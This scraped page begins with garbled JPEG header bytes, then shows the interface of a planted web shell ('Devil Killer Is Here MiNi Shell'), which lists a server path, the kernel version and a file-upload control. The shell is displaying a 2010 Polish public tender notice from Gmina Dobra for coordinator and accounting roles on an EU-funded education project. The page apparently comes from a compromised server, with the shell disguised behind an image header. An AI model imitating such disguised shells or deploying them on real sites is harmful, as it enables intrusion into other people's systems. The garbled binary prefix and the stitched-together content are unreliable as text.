JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100708/201328-N-2010.html

<p class="kh_header"><b>Dobra: pełnienie funkcji koordynatora, asystenta koordynatora oraz specjalisty ds. obsługi finansowo - księgowej projektu i asystenta ds. rozliczeniowych oraz finansowo - księgowych w ramach projektu pn. Ty też potrafisz współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 201328 - 2010; data zamieszczenia: 08.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobra , plac Wojska Polskiego 10, 62-730 Dobra, woj. wielkopolskie, tel. 0-63 279-90-11, faks 0-63 279-90-11.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> pełnienie funkcji koordynatora, asystenta koordynatora oraz specjalisty ds. obsługi finansowo - księgowej projektu i asystenta ds. rozliczeniowych oraz finansowo - księgowych w ramach projektu pn. Ty też potrafisz współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Opis przedmiotu zamówienia: pełnienie funkcji koordynatora, asystenta koordynatora oraz specjalisty ds. obsługi finansowo - księgowej projektu i asystenta ds. rozliczeniowych oraz finansowo - księgowych w ramach projektu pn. Ty też potrafisz współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
2	Projekt  Ty też potrafisz współfinansowany ze środków Europejskiego Funduszu Społecznego realizowany  w   ramach Programu Operacyjnego Kapitał Ludzki Priorytetu, IX Rozwój wykształcenia i kompetencji w regionach,  Działania 9.1 wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych, Programu Operacyjnego Kapitał Ludzki.
3	Dane dotyczące projektu:
3.1	Projekt realizowany jest w trzech gminach - Dobra, Brudzew Kawęczyn;
3.2	Wartość projektu - 2.792.021,14 zł.;
3.3	Liczba placówek oświatowych objętych projektem - 10;
3.4	Liczba dzieci i młodzieży objętych projektem - 1.947;
4	Zakresy obowiązków i czynności: 
4.1	Część I - Koordynator projektu:
4.1.1	Przejęcie odpowiedzialności za całość realizacji projektu, w szczególności zarządzanie przedsięwzięciami na wszystkich jego etapach;
4.1.2	Terminowe i właściwe realizowanie całości projektu, w szczególności zarządzanie przedsięwzięciami na wszystkich jego etapach; 
4.1.3	Koordynowanie działań projektowych; 
4.1.4	Nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem;
4.1.5	Kierowanie wykonaniem projektu w formie nadzoru merytorycznego 
i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem  aplikacyjnym i przepisami krajowymi i Unii Europejskiej;
4.1.6	Nadzorowanie bieżących postępów w realizacji projektu;
4.1.7	Nadzór nad całością prac związanych z realizacją projektu i ich jakością;
4.1.8	Zarządzanie planowanymi działaniami projektowymi;
4.1.9	Koordynacja prac zespołu projektowego i podejmowanie decyzji;
4.1.10	Dokonywanie podziału obowiązków pomiędzy członków zespołu projektowego;
4.1.11	Nadzorowanie pracy wszystkich osób zaangażowanych w realizację projektu;
4.1.12	Koordynacja działań merytorycznych i logistycznych związanych z projektem;
4.1.13	Utrzymywanie stałych kontaktów z opiekunami projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów;
4.1.14	Nadzorowanie  terminowego  sporządzania wniosków o płatność wraz z zebraniem wszystkich załączników;
4.1.15	Nadzorowanie przygotowania i realizacji zamówień publicznych zgodnie z ustawą Prawo Zamówień Publicznych w zakresie działań projektowych;
4.1.16	Przygotowywanie i koordynacja korespondencji związanej z projektem do Instytucji Pośredniczącej;
4.1.17	Planowanie działań i wywiązywanie się ze wskaźników;
4.1.18	Kierowanie bieżącymi sprawami związanymi z realizacją projektu;
4.1.19	Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu;
4.1.20	Obecność podczas kontroli projektu;
4.1.21	Współpraca z kierownikami szkolnymi i  nauczycielami w zakresie przygotowania szczegółowych programów zajęć;
4.1.22	Nadzorowanie przebiegu zajęć;
4.1.23	Nadzór nad jakością materiałów dydaktycznych;
4.1.24	Nadzór nad opracowaniem szczegółowego harmonogramu zajęć;
4.1.25	Nadzór nad zaprojektowaniem ankiet ewaluacyjnych dla potrzeb ewaluacji;
4.1.26	Nadzór na monitoringiem i ewaluacją projektu oraz jego promocja;
4.1.27	Kontrola wydatkowania środków;
4.2	Część II - Asystent koordynatora:
4.2.1	Bieżąca realizacja zadań wynikających z projektu i współpraca z Koordynatorem projektu;
4.2.2	Nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem;
4.2.3	Nadzór nad realizacją projektu w części merytorycznej i finansowej zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym i przepisami krajowymi i Unii Europejskiej;
4.2.4	Zarządzanie planowanymi działaniami finansowymi projektu;
4.2.5	Wykonywanie czynności administracyjnych związanych z realizacją projektu;
4.2.6	Prowadzenie bieżącej dokumentacji projektu w oparciu o obowiązujące zapisy;
4.2.7	Sporządzanie  wniosków o płatność wraz z zebraniem wszystkich załączników;
4.2.8	Sporządzanie sprawozdań z realizacji projektu we współpracy z Koordynatorem projektu w zakresie realizacji zaplanowanych działań w projekcie;
4.2.9	Kontakt z partnerami w zakresie działań finansowych projektu;
4.2.10	Wspieranie działań Koordynatora projektu w aspekcie księgowym, w odniesieniu do poszczególnych zadań objętych projektem, a także okresowe dokonywanie przeglądów realizacji projektów;
4.2.11	Nadzór nad prowadzeniem dokumentacji księgowej projektu zgodnie            z obowiązującymi przepisami finansowymi;
4.2.12	Współpraca w zakresie księgowości z Instytucją Pośredniczącą;
4.2.13	Współpraca w zakresie księgowości z partnerem projektu;
4.2.14	Kontrola poprawności formalnej księgowych i finansowych dokumentów projektu;
4.2.15	Nadzór nad odpowiednim opisywaniem dokumentów związanych                   z realizacją projektu, zgodnie z wytycznymi;
4.2.16	Poddanie się kontroli prowadzonej przez organy wewnętrzne                         i instytucje zewnętrzne w zakresie realizacji projektu;
4.2.17	Obecność podczas kontroli projektu;
4.2.18	Kontrola poprawności dokonanej klasyfikacji dokumentów z uwagi na: nazwę projektu, kwotę wynikającą z budżetu projektu a wielkością zrealizowaną, źródło finansowania, pozycje budżetowe, podział na wydatki kwalifikowane, kategorie dodatkowe, zależnie od potrzeb projektu;
4.2.19	Dokonywanie wspólnie z Koordynatorem kontroli księgowania kosztów projektu pod kątem spełnienia kryteriów dla tzw. wydatków kwalifikowanych, a w szczególności sprawdzenia czy są: konieczne dla wykonania zadań określonych projektem; związane z finansowaniem umów zawartych przez zamawiającego w celu osiągnięcia zadań wynikających z opisu projektu i są związane z realizacją projektu; udokumentowane odpowiednimi i prawidłowo sporządzonymi dokumentami źródłowymi;
4.2.20	Nadzór nad prawidłowym oznaczeniem i opisywaniem dokumentów księgowych przetwarzanych przy realizacji projektu;
4.2.21	Przygotowanie raportów o finansowym postępie w realizacji projektu; 
4.2.22	Zapobieganie powstawaniu nieprawidłowości finansowych                           i raportowanie ich wystąpienia; 
4.2.23	Przestrzeganie procedur i instrukcji związanych z realizacją projektu.
4.3	Część III - Specjalista ds. obsługi finansowo - księgowej projektu:
4.3.1	Wspieranie działań Koordynatora i Asystenta projektu w aspekcie księgowym, w odniesieniu do poszczególnych zadań objętych projektem, a także okresowe dokonywanie przeglądów realizacji projektu;
4.3.2	Sporządzenie sprawozdań okresowych;
4.3.3	Prowadzenie dokumentacji księgowej projektu zgodnie                                    z obowiązującymi przepisami finansowymi, w tym opisywanie faktur;
4.3.4	Współpraca w zakresie księgowania i realizacji płatności projektu                   z Referatem  Finansowo-Podatkowym Urzędu Miejskiego w Dobrej;
4.3.5	Współpraca w zakresie księgowości z Instytucją Pośredniczącą;
4.3.6	Współpraca w zakresie księgowości z partnerem projektu;
4.3.7	Kontrola poprawności formalnej księgowych i finansowych dokumentów projektu;
4.3.8	Odpowiednie opisywanie dokumentów związanych z realizacją projektu, zgodnie z wytycznymi;
4.3.9	Kontrola poprawności dokonanej klasyfikacji dokumentów z uwagi na: nazwę projektu, kwotę wynikającą z budżetu projektu a wielkością zrealizowaną, źródło finansowania, pozycje budżetowe projektów, podział na wydatki kwalifikowane, kategorie dodatkowe (zależnie od potrzeb projektu);
4.3.10	Dokonywanie kontroli księgowania kosztów projektu pod kątem spełnienia kryteriów dla tzw. wydatków kwalifikowanych,                                  a w szczególności sprawdzenia czy są: konieczne dla wykonania zadań określonych projektem; związane z finansowaniem umów zawartych przez zamawiającego w celu osiągnięcia zadań wynikających z opisu projektu i są związane z realizacją projektu; udokumentowane odpowiednimi i prawidłowo sporządzonymi dokumentami źródłowymi;
4.3.11	Sporządzanie zestawień dokumentów rozliczeniowych przedstawiających wykorzystanie środków realizowanego projektu;
4.3.12	Sporządzanie  wniosków o płatność wraz z zebraniem wszystkich załączników;
4.3.13	Przygotowanie raportów o finansowym postępie w realizacji projektu; 
4.3.14	Zapobieganie powstawaniu nieprawidłowości finansowych                              i raportowanie ich wystąpienia;
4.3.15	Weryfikacja faktur pod względem formalno-rachunkowym                               i prawidłowości rozliczeń finansowych uwzględniających wszystkie źródła finansowania;
4.3.16	Nadzór nad płatnościami dla wykonawców;
4.3.17	Przestrzeganie procedur i instrukcji związanych z realizacją projektu;
4.3.18	Współpraca z Koordynatorem Projektu i Asystentem Koordynatora                   w celu zapewnienia prawidłowego przepływu informacji;
4.3.19	Współpraca z organami kontrolującymi.
4.4	Część IV - asystenta ds. rozliczeniowych oraz finansowo - księgowych: 
4.4.1	Wspieranie działań Koordynatora I Asystenta projektu w aspekcie księgowym, w odniesieniu do poszczególnych zadań objętych projektem, a także okresowe dokonywanie przeglądów realizacji projektu;
4.4.2	Sporządzenie sprawozdań okresowych;
4.4.3	Prowadzenie dokumentacji księgowej projektu zgodnie                                    z obowiązującymi przepisami finansowymi, w tym opisywanie faktur;
4.4.4	Współpraca w zakresie księgowania i realizacji płatności projektu                   z Referatem  Finansowo-Podatkowym Urzędu Miejskiego w Dobrej;
4.4.5	Odpowiednie opisywanie dokumentów związanych z realizacją projektu, zgodnie z wytycznymi;
4.4.6	Kontrola poprawności dokonanej klasyfikacji dokumentów z uwagi na: nazwę projektu, kwotę wynikającą z budżetu projektu a wielkością zrealizowaną, źródło finansowania, pozycje budżetowe projektów, podział na wydatki kwalifikowane, kategorie dodatkowe (zależnie od potrzeb projektu);
4.4.7	Dokonywanie kontroli księgowania kosztów projektu pod kątem spełnienia kryteriów dla tzw. wydatków kwalifikowanych,                                         a w szczególności sprawdzenia czy są: konieczne dla wykonania zadań określonych projektem; związane z finansowaniem umów zawartych przez zamawiającego w celu osiągnięcia zadań wynikających z opisu projektu i są związane z realizacją projektu; udokumentowane odpowiednimi i prawidłowo sporządzonymi dokumentami źródłowymi;
4.4.8	Zapobieganie powstawaniu nieprawidłowości finansowych                               i raportowanie ich wystąpienia;
4.4.9	Rejestracja faktur i rachunków wpływających;
4.4.10	Weryfikacja faktur pod względem formalno-rachunkowym                                 i prawidłowości rozliczeń finansowych uwzględniających wszystkie źródła finansowania;
4.4.11	Nadzór nad płatnościami;
4.4.12	Przestrzeganie procedur i instrukcji związanych z realizacją projektu;
4.4.13	Ścisła współpraca z Głównym Księgowym Zamawiającego w zakresie księgowości projektu;
4.4.14	Współpraca z Koordynatorem Projektu i Asystentem Koordynatora                 w celu zapewnienia prawidłowego przepływu informacji.
5	Wykonywanie zleconych zadań odbywać się będzie w siedzibie Zamawiającego przez czas trwanie umowy  we wszystkie dni 
z wyłączeniem dni ustawowo wolnych od pracy, również w godzinach popołudniowych. W przypadku kolizji świadczeń, świadczenie na rzecz Zamawiającego posiada pierwszeństwo przed świadczeniami na rzecz osób trzecich. Wykonawcy przyjmujący obowiązki związane z prowadzeniem Projektu będą zatrudnieni przez Zamawiającego na podstawie umowy zlecenia. Wykonawców obowiązuje należyta staranność w wykonywaniu przedmiotu zamówienia. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawców podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.21.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamaweiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli Wykonawca wykaże i udokumentuje wykonanie usług w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie:
1 Część I - koordynator projektu - min. 1 usługę polegającą na wdrażaniu i zarządzaniu projektów finansowanych ze środków Unii Europejskiej, o wartości min. 2.500.000,00 zł.
2 Część II - asystent koordynatora - min. udział w realizacji min. 1 projektu współfinansowanego ze środków EFS.
3 Część III - Specjalista ds. obsługi finansowo - księgowej projektu - udział w realizacji min. 1 projektu współfinansowanego ze środków EFS.
4 Część IV - Asystent ds. rozliczeniowych oraz finansowo-księgowych projektu - udział w realizacji min. 1 projektu współfinansowanego ze środków EFS.
Zamawiający dokona oceny spełnienia warunku poprzez analizę wykazu określonego w pkt 15.1.1 stosując formułę spełnia/niespełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli Wykonawca wykaże osoby, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami. W szczególności Wykonawca wykaże, że dysponuje min 1 osobą w każdej części posiadającą następujące kwalifikacje zawodowe, wykształcenie i staż pracy:
1	Część I - koordynator projektu:
1.1	wykształceniu wyższym,
1.2	doświadczeniu zawodowym w administracji samorządowej na stanowisku związanym z funduszami unijnymi (minimum 5 lat),
1.3	znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej, 
1.4	znajomości przepisów ustawy Prawo zamówień publicznych oraz ustawy o finansach publicznych, 
1.5	umiejętności obsługi komputera, 
1.6	ukończeniu co najmniej 3 szkoleń/kursów/seminariów z zakresu funduszy unijnych (zarządzania funduszami/ możliwości pozyskiwania i rozliczania funduszy),
2	Część II - asystent koordynatora:  
2.1	wykształceniu wyższym magisterskim,
2.2	doświadczeniu zawodowym w administracji samorządowej - preferowane doświadczenie w referacie finansowym (minimum 5 lat),
2.3	doświadczeniu w zakresie rachunkowości budżetowej (minimum 3 lata pracy),
2.4	ukończeniu co najmniej 2 szkoleń/kursów/ z zakresu funduszy unijnych (zarządzania funduszami/ możliwości pozyskiwania i rozliczania funduszy/) 
2.5	znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej, 
2.6	znajomości przepisów ustawy Prawo zamówień publicznych oraz ustawy o finansach publicznych, 
2.7	umiejętności obsługi komputera,
3	Część III -  Specjalista ds. obsługi finansowo - księgowej projektu:
3.1	wykształceniu wyższym magisterskim, 
3.2	doświadczeniu zawodowym w administracji samorządowej  w referacie finansowym (księgowość budżetowa - minimum 10 lat),
3.3	ukończeniu co najmniej 1 szkolenia z zakresu wydatków strukturalnych, 
3.4	znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej, 
3.5	znajomości przepisów ustawy o finansach publicznych, 
3.6	umiejętności obsługi komputera w tym znajomość obsługi programu KBiP (Księgowość Budżetowa i Planowanie). 
3.7	posiada świadectwo kwalifikacyjne uprawniające do usługowego prowadzenia ksiąg rachunkowych lub certyfikat księgowy, wydane na podstawie odrębnych przepisów,
4	Część IV - Asystent ds. rozliczeniowych oraz finansowo-księgowych projektu:
4.1 wykształcenie co najmniej średnie,
4.2 doświadczeniu zawodowym w administracji samorządowej  w referacie finansowym - minimum 10 lat), 
4.3 znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej,
4.4 znajomości przepisów ustawy o finansach publicznych, 
4.5 umiejętności obsługi komputera.
Zamawiający dokona oceny spełnienia warunku poprzez analizę wykazu określonego w pkt 15.1.2 stosując formułę spełnia/niespełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta, Parafowany wzór umowy, Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca jest zobowiązany udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając, w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
